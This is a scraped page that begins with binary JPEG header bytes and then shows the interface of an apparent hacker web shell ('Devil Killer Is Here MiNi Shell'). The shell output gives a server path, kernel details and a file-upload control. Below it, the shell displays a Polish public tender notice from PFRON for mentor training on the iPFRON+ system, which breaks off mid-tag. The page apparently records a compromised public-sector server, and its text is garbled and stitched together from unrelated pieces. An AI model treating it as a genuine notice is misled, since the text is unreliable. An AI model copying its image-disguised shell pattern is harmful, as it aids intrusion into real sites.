JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220601/0018956001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi mentorów do przeprowadzenia szkoleń dla użytkowników Systemu iPFRON+ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWY FUNDUSZ REHABILITACJI OSÓB NIEPEŁNOSPRAWNYCH</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PFRON</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 012059538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Jana Pawła II 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-828</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 22 50 55 879</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.ipfronplus@pfron.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.pfron.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowy fundusz celowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi mentorów do przeprowadzenia szkoleń dla użytkowników Systemu iPFRON+ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a8a2d699-dbff-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00189560</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00053174/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.16 Świadczenie usługi mentorów do przeprowadzenia szkoleń dla użytkowników Systemu iPFRON+</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Uniwersalna platforma do projektowania i realizacji programów wsparcia ON wraz ze zintegrowanym modułem analitycznym – System iPFRON+” w ramach Programu Operacyjnego Polska Cyfrowa 2014-2020, Oś Priorytetowa 2 „Eadministracja i otwarty rząd”, Działanie 2.1 „Wysoka dostępność i jakość e-usług publicznych” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pfron <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Komunikacja w postępowaniu, zgodnie z art. 61 ust. 1 ustawy Pzp, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną.<br/>2. W postępowaniu komunikacja między Zam. a Wykonawcami, w szczególności składanie ofert, wniosków, wszelkich dokumentów i<br/>oświadczeń, zawiadomień odbywa się przy użyciu Platformy: https://platformazakupowa.pl/pn/pfron. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wczytania do Platformy. Korzystanie z Platformy jest bezpłatne.<br/>3.Zamawiający dopuszcza możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej (innych niż oferta i załączniki do oferty) bądź innej korespondencji na adres e-mail: zamowienia.ipfronplus@pfron.org.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl znajduje się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>2. Zalecenia Zamawiającego dotyczące podpisów:<br/>a) Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>- dla dokumentów w formacie „pdf” zaleca się podpis formatem PAdES (PDF Advanced Electronic Signature),<br/>- dla dokumentów w formacie innym niż „pdf” zaleca się podpis formatem XAdES (XML Advanced Electronic Signature).<br/>b) Zalecenia Zamawiającego odnośnie podpisu osobistego :<br/>- w przypadku wykorzystywania aplikacji eDO App (obsługuje tylko dokumenty w formacie .pdf) na telefonach z obsługą technologii NFC wielkość dokumentów nie może przekraczać 5 MB,<br/>- dla dokumentów w formacie „pdf” zaleca się podpis wewnętrzny (otoczony),<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym.<br/>c) Zalecenia Zamawiającego odnośnie podpisu zaufanego :<br/>- wielkość plików nie może przekraczać 10 MB,<br/>- dla dokumentów w formacie „pdf” zaleca się podpis formatem PAdES (podpisany plik ma rozszerzenie .pdf),<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES (podpisany plik ma rozszerzenie .xml).<br/>d) W przypadku korzystania z wariantu składania podpisów zewnętrznych konieczne jest załączenie na Platformę odpowiedniej pary plików, tj. pliku podpisywanego (źródłowego) oraz pliku zawierającego podpis.<br/>e) Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>f) Jeśli Wykonawca pakuje dokumenty np. w plik ZIP zaleca się wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>3. Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniej-szej niż 512 kb/s;<br/>- komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Win-dows 7, Mac Os x 10.4, Linux lub ich nowsze wersje;<br/>- zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10;<br/>- włączona obsługa JavaScript;<br/>- zainstalowany program Acrobat Reader lub inny obsługujący pliki w for-macie .pdf;<br/>- Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>- Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>4. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB, natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>5. Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .docx, odt, .jpg (.jpeg), przy czym Zamawiający zaleca<br/>wczytywanie na Platformę plików w formacie .pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, .7Z.<br/>6. Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>-stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniej-szej niż 512 kb/s;<br/>- komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Win-dows 7, Mac Os x 10.4, Linux lub ich nowsze wersje;<br/>- zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10;<br/>- włączona obsługa JavaScript;<br/>- zainstalowany program Acrobat Reader lub inny obsługujący pliki w for-macie .pdf<br/>- Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>- Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>7. Pozostałe szczegóły dotyczące komunikacji zawiera Rozdział 13 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje o przetwarzaniu danych osobowych przez Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych:<br/>Działając na podstawie art. 13 i 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, w związku z prowadzonym postępowaniem o udzielenie zamówienia na świadczenie usługi mentorów do przeprowadzenia szkoleń dla użytkowników Systemu iPFRON+ (dalej: Postępowanie”), Zamawiający przekazuje poniżej informacje dotyczące przetwarzania danych osobowych.<br/><br/>Tożsamość administratora<br/>Administratorem danych osobowych jest Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych (PFRON) z siedzibą w<br/>Warszawie (00-828), przy al. Jana Pawła II 13.<br/><br/>Dane kontaktowe administratora<br/>Z administratorem można skontaktować się poprzez adres e-mail: kancelaria@pfron.org.pl, telefonicznie pod numerem +48 22 50 55<br/>500 lub pisemnie na adres siedziby administratora.<br/><br/>Dane kontaktowe Inspektora Ochrony Danych<br/>Administrator wyznaczył inspektora ochrony danych, z którym można skontaktować się poprzez e-mail: iod@pfron.org.pl we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem.<br/><br/>Cele przetwarzania<br/>Celem przetwarzania danych osobowych jest przeprowadzenie Postępowania oraz archiwizacja dokumentacji.<br/><br/>Podstawa prawna przetwarzania<br/>Podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO (realizacja przez administratora obowiązku<br/>prawnego). Podstawą przetwarzania danych osobowych może być także art. 6 ust. 1 lit. f RODO w związku z realizacją przez<br/>administratora jego prawnie uzasadnionych interesów polegających na ustaleniu, dochodzeniu lub obronie roszczeń.<br/><br/>Źródło danych osobowych<br/>Administrator może pozyskiwać dane osobowe przedstawicieli Wykonawcy za jego pośrednictwem.<br/><br/>Kategorie danych osobowych<br/>Zakres danych dotyczących przedstawicieli Wykonawcy obejmuje dane osobowe przedstawione w związku z udziałem w<br/>Postępowaniu, w szczególności imię, nazwisko, stanowisko, adres poczty elektronicznej lub numer telefonu.<br/><br/>Okres, przez który dane będą przechowywane<br/>Dane osobowe będą przetwarzane przez okres prowadzenia Postępowania, a w przypadku, gdy okres obowiązywania umowy<br/>zawartej w wyniku Postępowania przekracza 4 lata – przez cały okres obowiązywania ww. umowy. Dane osobowe mogą być<br/>przechowywane przez okres przedawnienia roszczeń w przypadku ustalania, dochodzenia lub obrony tych roszczeń.<br/><br/>Podmioty, którym będą udostępniane dane osobowe<br/>Dostęp do danych osobowych mogą mieć podmioty świadczące na rzecz administratora usługi doradcze związane z realizacją<br/>projektu iPFRON+, z zakresu pomocy prawnej, pocztowe, dostawy lub utrzymania i rozwoju systemów informatycznych.<br/>Dane osobowe mogą być udostępniane przez PFRON podmiotom uprawnionym do ich otrzymania na mocy obowiązujących<br/>przepisów prawa, np. organom publicznym.<br/>Z uwagi na współfinansowanie zamówienia ze środków Europejskiego Funduszu Rozwoju Regionalnego odbiorcą Pani/Pana danych osobowych może być również Instytucja Zarządzająca POPC, Instytucja Kontrolującą, Instytucja Pośrednicząca, Komisja Europejska lub inne instytucje uprawnione do przeprowadzania kontroli Projektu.<br/>Niezależnie od powyższego odbiorcami danych osobowych mogą być wszyscy zainteresowani przebiegiem Postępowania, z<br/>zastrzeżeniem wyjątków określonych w art. 18 ust. 5 pkt 1 i 2 ustawy – Prawo zamówień publicznych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobom fizycznym, które dane osobowe przetwarza administrator, przysługuje:<br/>1) na podstawie art. 15 RODO – prawo dostępu do danych osobowych i uzyskania ich kopii;<br/>2) na podstawie art. 16 RODO – prawo do sprostowania i uzupełnienia danych osobowych, z zastrzeżeniem, że skorzystania z tego prawa nie może naruszać integralności protokołu postępowania oraz jego załączników oraz nie może skutkować zmianą wyniku Postępowania ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp;<br/>3) na podstawie art. 17 RODO – prawo do usunięcia danych osobowych;<br/>4) na podstawie art. 18 RODO – prawo żądania od administratora ograniczenia przetwarzania danych, z tym zastrzeżeniem, że<br/>zgłoszenie tego żądania nie ogranicza przetwarzania danych osobowych do czasu zakończenia Postępowania;<br/>5) na podstawie art. 21 RODO – prawo do wniesienia sprzeciwu wobec przetwarzania danych osobowych na podstawie art. 6 ust. 1<br/>lit. f RODO.<br/><br/>Prawo wniesienia skargi do organu nadzorczego<br/>Osobom fizycznym, które dane osobowe przetwarza administrator, przysługuje prawo wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00 - 193 Warszawa, na niezgodne z prawem przetwarzanie danych osobowych przez administratora.<br/><br/>Informacja o dowolności lub obowiązku podania danych oraz o ewentualnych konsekwencjach niepodania danych<br/>Podanie danych osobowych może być warunkiem koniecznym wzięcia udziału w Postępowaniu (konsekwencją niepodania danych w zakresie wynikającym z SWZ będzie odrzucenie oferty na zasadach wynikających z ustawy – Prawo zamówień publicznych).<br/><br/>Informacja o możliwości przekazania danych osobowych do państwa trzeciego.<br/>W związku z jawnością Postępowania dane osobowe mogą być przekazywane poza obszar Europejskiego Obszaru<br/>Gospodarczego, z zastrzeżeniem wyjątków określonych w art. 18 ust. 5 pkt 1 i 2 ustawy – Prawo zamówień publicznych.<br/><br/>Informacja o zautomatyzowanym podejmowaniu decyzji<br/>Decyzje podejmowane przez administratora nie będą opierały się wyłącznie na zautomatyzowanym przetwarzaniu.<br/><br/>2. Realizacja obowiązku informacyjnego w imieniu administratora<br/>2.1 Wykonawca jest zobowiązany do przekazania informacji o przetwarzaniu danych osobowych przez administratora osobom,<br/>których dane zawarte są w ofercie.<br/>2.2 W przypadku konieczności powierzenia Wykonawcy przetwarzania danych osobowych w ramach realizacji umowy zamawiający<br/>przeprowadzi weryfikację wdrożenia przez Wykonawcę odpowiednich środków technicznych i organizacyjnych, zgodnych z<br/>przepisami o ochronie danych osobowych i chroniących prawa osób, których dane dotyczą.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/11/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 977062,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usługi mentorów w zakresie przeprowadzenia szkoleń stacjonarnych i online<br/>organizowanych przez Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych dla użytkowników systemu informatycznego iPFRON+ realizowanego w ramach projektu pn. „Uniwersalna platforma do projektowania i realizacji programów wsparcia ON wraz ze zintegrowanym modułem analitycznym – System iPFRON+” w ramach Programu Operacyjnego Polska Cyfrowa 2014-2020, Oś Priorytetowa 2 „E-administracja i otwarty rząd”, Działanie 2.1 „Wysoka dostępność i jakość e-usług publicznych” (dalej jako „System iPFRON+”).<br/>2. Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 1 do SWZ (dalej jako „OPZ”).<br/>3. Warunki oraz zasady realizacji zamówienia zawarte są również w projektowanych postanowieniach umowy w sprawie<br/>zamówienia publicznego, które zostaną wprowadzone do treści umowy stanowiących Załącznik nr 2 do SWZ (dalej jako<br/>„PPU”).<br/>4. Termin realizacji Umowy – od dnia zawarcia Umowy do 30 maja 2023 roku lub do wyczerpania maksymalnego wynagrodzenia brutto, o którym mowa w paragrafie 5 ustęp 1 Umowy w zależności od tego, która sytuacja nastąpi wcześniej.<br/>5. Wstępny harmonogram szkoleń stacjonarnych i online stanowi Załącznik nr 5 do Umowy. Terminy wskazane we wstępnym harmonogramie są terminami szacowanymi, które po zawarciu Umowy mogą ulec zmianie.<br/>6. Szczegółowy harmonogram szkoleń Strony uzgodnią po zawarciu Umowy.<br/>7. Szczegóły dotyczące pozostałych terminów realizacji poszczególnych czynności i warunków realizacji przedmiotu<br/>zamówienia znajdują się w OPZ oraz PPU. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <p class="mb-0">80590000-6 - Usługi seminaryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 4.4. Zamawiający w ramach realizacji Przedmiotu Umowy przewiduje opcję, o której mowa w art. 441 ustawy Pzp,<br/>uprawniającą Zamawiającego do:<br/>4.4.1. rezygnacji o nie więcej niż 30% wartości łącznego maksymalnego wynagrodzenia określonego w paragrafie 5 ust. 1<br/>pkt 1.1 i 1.2 PPU (Umowy) (dalej jako „Opcja zmniejszająca”). Liczba szkoleń stacjonarnych i online wskazanych w<br/>odpowiednio w poz. 1.1 i 1.2 Rozdziału II OPZ są wielkościami szacunkowymi, które Zamawiający przewiduje zrealizować w<br/>okresie obowiązywania Umowy, natomiast faktyczna ich liczba będzie uzależniona od liczby Zapotrzebowań zleconych<br/>Wykonawcy do realizacji w związku z rzeczywistymi potrzebami Zamawiającego, możliwości finansowych Zamawiającego<br/>oraz sytuacji epidemiologicznej;<br/>4.4.2. skorzystania z usług zapewnienia tłumaczy PJM podczas szkoleń online do wysokości maksymalnego wynagrodzenia<br/>określonego w paragrafie 5 ust. 1 pkt 1.3 Umowy (dalej jako „Opcja zwiększająca”). Liczba usług tłumaczy PJM w trakcie<br/>szkoleń jest wartością szacunkową, którą Zamawiający przewiduje zrealizować w okresie obowiązywania Umowy, natomiast<br/>faktyczna ich liczba będzie uzależniona od potrzeb zgłoszonych przez uczestników szkoleń. Szacowana liczba szkoleń online z udziałem tłumaczy PJM - 5.<br/>Opcja zmniejszająca i Opcja zwiększająca zwane są łącznie „Opcją”.<br/>4.5. Zamawiający jest uprawniony, lecz nie zobowiązany do skorzystania w trakcie realizacji Umowy z Opcji wielokrotnie, aż<br/>do wyczerpania limitów przewidzianych w pkt 4.4.1-4.4.2 powyżej. Zamawiający według własnego wyboru może skorzystać<br/>z Opcji zarówno w pełnym, jak i w częściowym zakresie.<br/>4.6. Warunkiem skorzystania z Opcji jest złożenie przez Zamawiającego pisemnego oświadczenia w przedmiocie<br/>skorzystania z Opcji w określonym przez niego zakresie. Oświadczenie, o którym mowa w zdaniu pierwszym Zamawiający<br/>składa z wykorzystaniem „Wzoru Zapotrzebowania” (Załącznik nr 3 do Umowy).<br/>4.7. Jeśli Umowa nakłada na Wykonawcę obowiązki związane z realizacją Przedmiotu Umowy objętego Opcją, wiążą one<br/>Wykonawcę z chwilą złożenia oświadczenia w postaci Zapotrzebowania.<br/>4.8. Zamawiający zastrzega sobie prawo do skorzystania z Opcji od dnia zawarcia Umowy przez cały okres je<br/>obowiązywania, na co Wykonawca wyraża zgodę.<br/>4.9. Wykonawcy nie przysługują w stosunku do Zamawiającego żadne roszczenia, w szczególności roszczenia<br/>odszkodowawcze, z tytułu skorzystania lub nieskorzystania z Opcji przez Zamawiającego. <!-- realizacja do --> <h3 